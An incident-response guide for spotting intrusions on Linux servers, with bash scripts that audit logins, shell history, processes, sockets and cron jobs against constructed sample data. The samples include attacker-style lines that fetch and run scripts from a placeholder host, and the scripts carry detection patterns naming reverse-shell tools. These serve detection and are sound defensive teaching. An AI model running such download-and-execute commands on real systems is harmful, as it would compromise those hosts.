Introduction
The following steps may help you find traces of an intrusion on a Linux server. Run them as root, and keep in mind that an attacker who already has root can alter anything the live system reports, so treat a clean result as evidence, not proof.
1 Monitor users’ activities
2 Check system process
3 Check the network traffic
4 Check cron jobs
5 Check Rootkits infections
1 Monitor users’ activities
1.1 Check the currently logged-in users
First, log in to your Linux server and list the currently logged-in users with the command "w". The FROM column shows the address each session came from. Look up any address you do not recognise at https://www.iplocation.net/ or, better, compare it against your own list of administrator addresses. A session from an unfamiliar IP is a strong sign the server has been compromised. Note that "w" only shows interactive sessions; a backdoor that does not log in over SSH will not appear here.
1.2 Check recently logged-in users and their IP addresses
Use the command "last -10" to see the ten most recent logins recorded in /var/log/wtmp (add "-i" to show IP addresses instead of hostnames). "lastb" lists failed login attempts from /var/log/btmp; a long run of failures followed by a success from the same address is the classic brute-force pattern. Attackers who gain root often truncate these files, so an empty or suspiciously short login history is itself a warning sign.
1.3 Check the bash history
If you suspect a specific user of malicious activity, check that user's shell history. Do not log in as the user: their shell start-up files may have been tampered with. Instead, as root, read the history file directly (/home/USER/.bash_history, or /root/.bash_history for root) and look for downloads, "chmod +x", base64 decoding and crontab edits. A history that is empty or ends with "history -c" or "unset HISTFILE" has probably been cleaned, which is also evidence.
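The two checks from this section, login sources and shell history, can be scripted so they are repeatable across many hosts. The script below is an added example and not part of the original page: the allow-list of administrator address prefixes, the suspicious-command pattern list and the sample "last" output and history file are all constructed for illustration (TEST-NET addresses, no real hosts). On a live host, feed the functions real data: unknown_logins "$(last -i -w -n 50)" and, as root, suspicious_history_lines /home/USER/.bash_history.

```bash
#!/bin/bash
# Added example (not from the original page): two checks for section 1,
# run here against constructed sample data. On a live host feed them the
# real output: unknown_logins "$(last -i -w -n 50)" and, as root,
# suspicious_history_lines /home/USER/.bash_history.

# Hypothetical allow-list: address prefixes your administrators connect from.
KNOWN_PREFIXES="203.0.113. 10.0.0."

# Constructed sample of "last -i" output (TEST-NET addresses, not real hosts).
SAMPLE_LAST='root     pts/0        203.0.113.5      Mon Mar  4 09:12   still logged in
deploy   pts/1        10.0.0.17        Mon Mar  4 08:55 - 09:01  (00:06)
root     pts/2        198.51.100.77    Sun Mar  3 03:14 - 03:40  (00:26)
root     pts/2        198.51.100.77    Sun Mar  3 03:02 - 03:10  (00:08)
reboot   system boot  0.0.0.0          Fri Mar  1 12:00   still running
wtmp begins Fri Mar  1 12:00:00 2024'

# Print "count user ip" for every login whose source address is not on the
# allow-list, most frequent first. $1 = text in "last -i" format.
unknown_logins() {
    printf '%s\n' "$1" | awk -v known="$KNOWN_PREFIXES" '
        BEGIN { n = split(known, pfx, " ") }
        /^wtmp begins/ || $1 == "reboot" || $3 == "0.0.0.0" { next }   # trailer, boots, console
        NF >= 3 {
            ok = 0
            for (i = 1; i <= n; i++) if (index($3, pfx[i]) == 1) ok = 1
            if (!ok) print $1, $3
        }' | sort | uniq -c | sort -rn
}

# Commands that commonly show up in a history after a compromise. The list is
# an illustration; extend it for your environment.
SUSPECT_HISTORY='wget |curl |chmod \+x|base64 (-d|--decode)|nc -e|/dev/tcp/|history -c|unset HISTFILE|crontab'

# Print matching lines (with line numbers) from a history file. Read the file
# directly as root rather than switching to the user, whose shell start-up
# files may have been modified.
suspicious_history_lines() {
    grep -nE "$SUSPECT_HISTORY" "$1"
}

# Constructed sample history file
HIST_FILE="$(mktemp)"
trap 'rm -f "$HIST_FILE"' EXIT
cat > "$HIST_FILE" <<'EOF'
ls -la
cd /tmp
wget http://198.51.100.77/x.sh
chmod +x x.sh
./x.sh
history -c
EOF

unknown_logins "$SAMPLE_LAST"
suspicious_history_lines "$HIST_FILE"
```

On the sample data the first function reports two root logins from 198.51.100.77, the only address outside the allow-list, and the second flags the download, the chmod and the "history -c" that tried to cover them. Prefix matching is deliberately simple; if your administrators come from a CIDR range that a string prefix cannot express, replace the awk test with a proper subnet check.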
2 Check system process
The first step is to check if there are any unknown or suspicious processes.
2.1 Check processes with high CPU and memory usage
Use the command "top" and press P to sort by CPU or M to sort by memory. A process using more than about 30% of CPU or memory that you did not start and cannot account for deserves a closer look; cryptominers, for example, typically pin every core. A process with an unfamiliar name, or a slightly misspelled name imitating a system daemon, is equally suspicious.
2.2 Check all processes
View all processes with the command "ps aux" (BSD-style syntax without a leading dash; "ps -aux" only works because ps guesses what you meant). "ps auxf" adds the process tree, which makes odd parent/child pairs stand out, such as a shell whose parent is a web server.
2.3 Check the files opened by a process, based on its PID
List the files and sockets a process has open with "lsof -n -P -p PID" (-n and -P skip DNS and port-name lookups, which avoids delays and keeps raw addresses). Replace PID with the PID of the suspicious process found in the previous two steps.
If it prompts the "-bash: lsof: command not found" error, you need to install lsof:
CentOS: yum install -y lsof
Ubuntu: sudo apt-get install -y lsof
2.4 Check the executable of a suspicious process
Use the command "ls -l /proc/PID/exe" to see which file the process was started from ("ll" is only an alias and is not available on every system). Replace PID with the PID of the suspicious process found in the previous steps. Two results are red flags: the link points into /tmp, /var/tmp, /dev/shm or a home directory, or it ends in "(deleted)", meaning the binary was removed from disk after it was started. "/proc/PID/cwd" and "/proc/PID/cmdline" show the working directory and the full command line, which help to tell a renamed miner from a legitimate daemon.
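Checking /proc/PID/exe by hand works for one PID; the script below, an added example and not from the original page, applies the same test to every process on the host. The list of directories it treats as suspicious (scratch directories and home directories) is a judgement call, not a rule from the page, so adjust it to your own build standard.

```bash
#!/bin/bash
# Added example (not from the original page): walk /proc and flag processes
# whose executable is in a world-writable scratch directory, a home
# directory, or has been deleted from disk, which is what
# "ls -l /proc/PID/exe" shows as "(deleted)". Run as root to see every process.

# Return 0 (true) if a resolved exe path looks suspicious, 1 otherwise.
# The directory list is an assumption for illustration; adjust it to your hosts.
suspicious_exe() {
    case "$1" in
        *" (deleted)")                            return 0 ;;  # binary unlinked after exec
        /tmp/*|/var/tmp/*|/dev/shm/*|/run/shm/*)  return 0 ;;  # scratch dirs anyone can write
        /home/*|/root/*)                          return 0 ;;  # daemons rarely live here
        *)                                        return 1 ;;
    esac
}

# Print "PID<TAB>exe<TAB>cmdline" for every live process that trips
# suspicious_exe. Kernel threads have no exe link and are skipped.
scan_processes() {
    for p in /proc/[0-9]*; do
        pid="${p#/proc/}"
        exe="$(readlink "$p/exe" 2>/dev/null)" || continue
        [ -n "$exe" ] || continue
        if suspicious_exe "$exe"; then
            cmd="$(cat "$p/cmdline" 2>/dev/null | tr '\0' ' ')"
            printf '%s\t%s\t%s\n' "$pid" "$exe" "$cmd"
        fi
    done
}

scan_processes
```

A hit is a starting point, not a verdict: follow it up with "lsof -n -P -p PID" and the network checks in the next section. Also remember that a kernel rootkit can hide a process from /proc entirely, which is why section 5 exists.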
3 Check network traffic
If a hacker leaves something on the system that has to communicate, whether a backdoor, a bot or a miner, it has to talk to the network, and you can often spot it by monitoring your traffic for unusual activity.
3.1 Check bandwidth usage
Use the command "iftop -n -P" to monitor current network traffic per connection (-n disables DNS lookups, -P shows port numbers instead of service names).
If it prompts the "-bash: iftop: command not found" error, you need to install iftop first:
CentOS: yum install -y iftop
Ubuntu: sudo apt-get install -y iftop
Each row is one connection: the local host on the left, the remote host on the right. "=>" is traffic sent from the local host to the remote host (outgoing), "<=" is traffic received from it (incoming).
The last three columns show the bandwidth of each connection averaged over the last 2, 10 and 40 seconds.
The summary lines at the bottom of the screen are:
TX: sent traffic
RX: received traffic
TOTAL: sent plus received
Cum: cumulative traffic since iftop was started
peak: peak rate observed
A connection to an unfamiliar address that moves data steadily is worth tracing back to its process with the commands in the next section.
3.2 Check listening and active ports
List listening sockets and active connections, together with the process that owns each one, by running "netstat -antup" (or "ss -tunap" on systems where netstat is no longer installed; both need root to show other users' processes). Compare the listening ports against the services the server is supposed to provide, and look at outbound connections too: a process you do not recognise holding a connection to an unknown address is a strong indicator of compromise.
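Reading a full socket listing by eye is error-prone on a busy server, so the script below, an added example and not from the original page, applies two rules to output in the "ss -tunap" format: a listening port that is not on an allow-list of expected services, and an established connection that this host opened to a non-private address. The allow-list, the sample socket table and the process name "sysupd" are all constructed for illustration; on a live host pipe in "ss -Htunap" instead.

```bash
#!/bin/bash
# Added example (not from the original page): audit socket listings in the
# format produced by "ss -tunap" (the iproute2 equivalent of netstat). The
# sample below is constructed; on a live host run, as root:
#   ss -Htunap | unexpected_listeners ; ss -Htunap | outbound_external

# Hypothetical allow-list of ports this server is supposed to use
# (22 ssh, 68 dhcp client, 80/443 web). Surrounding spaces make matching exact.
ALLOWED_PORTS=" 22 68 80 443 "

# Constructed sample of "ss -Htunap" output: documentation addresses only,
# and "sysupd" is an invented process name standing in for an unknown binary.
SAMPLE_SS='tcp   LISTEN 0   128   0.0.0.0:22        0.0.0.0:*           users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0   511   0.0.0.0:80        0.0.0.0:*           users:(("nginx",pid=1020,fd=6))
tcp   LISTEN 0   50    0.0.0.0:4444      0.0.0.0:*           users:(("sysupd",pid=31337,fd=4))
tcp   ESTAB  0   0     10.0.0.5:22       203.0.113.5:51822   users:(("sshd",pid=2001,fd=4))
tcp   ESTAB  0   0     10.0.0.5:49122    198.51.100.77:6667  users:(("sysupd",pid=31337,fd=5))
udp   UNCONN 0   0     0.0.0.0:68        0.0.0.0:*           users:(("dhclient",pid=640,fd=6))'

# awk helpers shared by both checks: port of an addr:port field, host part of
# it, process name out of users:(("name",pid=N,fd=M)), and an RFC 1918 /
# loopback test (IPv4 only; IPv6 peers are reported as external).
AWK_LIB='
function port(f)  { sub(/.*:/, "", f); return f }
function host(f)  { sub(/:[^:]*$/, "", f); return f }
function pname(f) { return (match(f, /"[^"]*"/)) ? substr(f, RSTART + 1, RLENGTH - 2) : "-" }
function private(ip) { return ip ~ /^(10\.|127\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)/ }
'

# Listening TCP/UDP sockets whose port is not on the allow-list: "proto port process".
unexpected_listeners() {
    awk -v allowed="$ALLOWED_PORTS" "$AWK_LIB"'
        ($1 == "tcp" && $2 == "LISTEN") || ($1 == "udp" && $2 == "UNCONN") {
            p = port($5)
            if (index(allowed, " " p " ") == 0) print $1, p, pname($7)
        }'
}

# Established connections this host opened (local port is not a service port)
# to a non-private peer: "peer process". This is where beacons and C2 show up.
outbound_external() {
    awk -v allowed="$ALLOWED_PORTS" "$AWK_LIB"'
        $2 == "ESTAB" {
            if (index(allowed, " " port($5) " ") == 0 && !private(host($6)))
                print $6, pname($7)
        }'
}

printf '%s\n' "$SAMPLE_SS" | unexpected_listeners
printf '%s\n' "$SAMPLE_SS" | outbound_external
```

On the sample the admin's inbound SSH session from 203.0.113.5 is not reported, because the local port 22 is an allowed service, while the same unknown process both listens on 4444 and holds an outbound connection to 198.51.100.77:6667. Its PID in the listing is what you take back to "ls -l /proc/PID/exe".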
4 Check cron jobs
Hackers often use cron for persistence: a scheduled task re-runs their malicious command regularly, and an "@reboot" entry relaunches it after a restart. /etc/crontab is only one place to look; also check /etc/cron.d, the per-user crontabs in /var/spool/cron (CentOS) or /var/spool/cron/crontabs (Ubuntu), /etc/anacrontab, and systemd timers ("systemctl list-timers --all").
List the scheduled tasks of the current user with "crontab -l".
List the scheduled tasks of another user (as root) with "crontab -l -u USER".
To view the hourly, daily, weekly and monthly cron jobs, list the following directories and read any script you do not recognise:
ls -la /etc/cron.hourly
ls -la /etc/cron.daily
ls -la /etc/cron.weekly
ls -la /etc/cron.monthly
To remove a malicious entry, edit the crontab (add "-u USER" for another user):
crontab -e
cron reloads a crontab when it is saved, so a restart is normally unnecessary. If you do need one, the service is called crond on CentOS and cron on Ubuntu:
service crond restart
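Cron entries are scattered over half a dozen locations, so it is easy to miss one. The script below, an added example and not from the original page, collects every file cron reads on both the CentOS and Ubuntu layouts and flags entries that use patterns typical of dropped persistence. The pattern list and the sample crontab tree it runs against are constructed for illustration; to audit a live host, leave CRON_ROOT at its default of "/" and run it as root, since the spool directories are not world-readable.

```bash
#!/bin/bash
# Added example (not from the original page): gather every file cron reads
# and flag entries with patterns typical of dropped persistence. CRON_ROOT
# points at a filesystem root, so the same functions run against "/" on a
# live host or against the constructed sample tree built below.

CRON_ROOT="${CRON_ROOT:-/}"

# Files cron actually executes from, on both Debian/Ubuntu and RHEL/CentOS
# layouts. Directories without matching files are skipped silently.
cron_sources() {
    r="${CRON_ROOT%/}"
    for f in "$r/etc/crontab" "$r/etc/anacrontab" "$r/etc/cron.d"/* \
             "$r/etc/cron.hourly"/* "$r/etc/cron.daily"/* \
             "$r/etc/cron.weekly"/* "$r/etc/cron.monthly"/* \
             "$r/var/spool/cron"/* "$r/var/spool/cron/crontabs"/*; do
        [ -f "$f" ] && printf '%s\n' "$f"
    done
    return 0
}

# Patterns worth a second look (illustrative, not exhaustive): download piped
# to a shell, inline decoders, payloads in scratch dirs, reverse shells.
SUSPECT_CRON='(curl|wget) .*\| *(ba)?sh|base64 +(-d|--decode)|/(tmp|dev/shm|var/tmp)/|nc +-e|/dev/tcp/|python[23]? +-c'

# Print "file:line:entry" for each non-comment cron line matching SUSPECT_CRON.
suspicious_cron_entries() {
    cron_sources | while IFS= read -r f; do
        grep -nE "$SUSPECT_CRON" "$f" | grep -vE '^[0-9]+:[[:space:]]*#' | sed "s|^|$f:|"
    done
}

# ---- constructed sample tree (stands in for a host's /) ----
SAMPLE_ROOT="$(mktemp -d)"
trap 'rm -rf "$SAMPLE_ROOT"' EXIT
mkdir -p "$SAMPLE_ROOT/etc/cron.d" "$SAMPLE_ROOT/var/spool/cron/crontabs"
cat > "$SAMPLE_ROOT/etc/crontab" <<'EOF'
SHELL=/bin/sh
17 *  * * * root cd / && run-parts --report /etc/cron.hourly
25 6  * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
EOF
echo '0 2 * * * root /usr/local/bin/backup.sh' > "$SAMPLE_ROOT/etc/cron.d/backup"
echo '*/5 * * * * root curl -s http://198.51.100.77/u.sh | sh' > "$SAMPLE_ROOT/etc/cron.d/sysupdate"
cat > "$SAMPLE_ROOT/var/spool/cron/crontabs/www-data" <<'EOF'
# a comment mentioning base64 -d must not be reported
@reboot /dev/shm/.x/run >/dev/null 2>&1
EOF

CRON_ROOT="$SAMPLE_ROOT"
suspicious_cron_entries
```

Against the sample tree it reports exactly two lines: the every-five-minutes download-and-run in /etc/cron.d and the @reboot payload in the www-data crontab, while the stock /etc/crontab entries, the backup job and the comment line pass. A web-server account with a crontab at all is already unusual on most servers and worth a question even before reading its contents.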
5 Check for rootkit infections
A rootkit is one of the most dangerous threats to a host: it hooks the system so that the attacker's processes, files and connections are hidden from the very tools used in sections 1 to 4, which is why a clean result above does not prove the server is clean. Removing one may mean a full reinstall, or even hardware replacement if firmware was compromised. chkrootkit (check rootkit) is a simple script that looks for the signatures of well-known rootkits and reports anything it finds as INFECTED.
First, install chkrootkit.
CentOS: run the following commands ("make sense" is the tarball's build target, not a typo; the FTP download is unauthenticated, so verify the archive against the checksum published by the chkrootkit project before building it):
cd ~
wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
tar xvf chkrootkit.tar.gz
cd chkrootkit-*
make sense
./chkrootkit
Ubuntu:
sudo apt-get update
sudo apt-get install -y chkrootkit
sudo chkrootkit
chkrootkit relies on the system's own binaries (ps, netstat, ls and so on), which a rootkit may have replaced, so a negative result from a compromised host is not conclusive. For a definitive answer, boot from trusted media or mount the disk on a clean machine and scan it from there ("chkrootkit -r DIR" uses DIR as the root directory), and treat any unexplained INFECTED line as a reason to rebuild the server from known-good media rather than to repair it in place.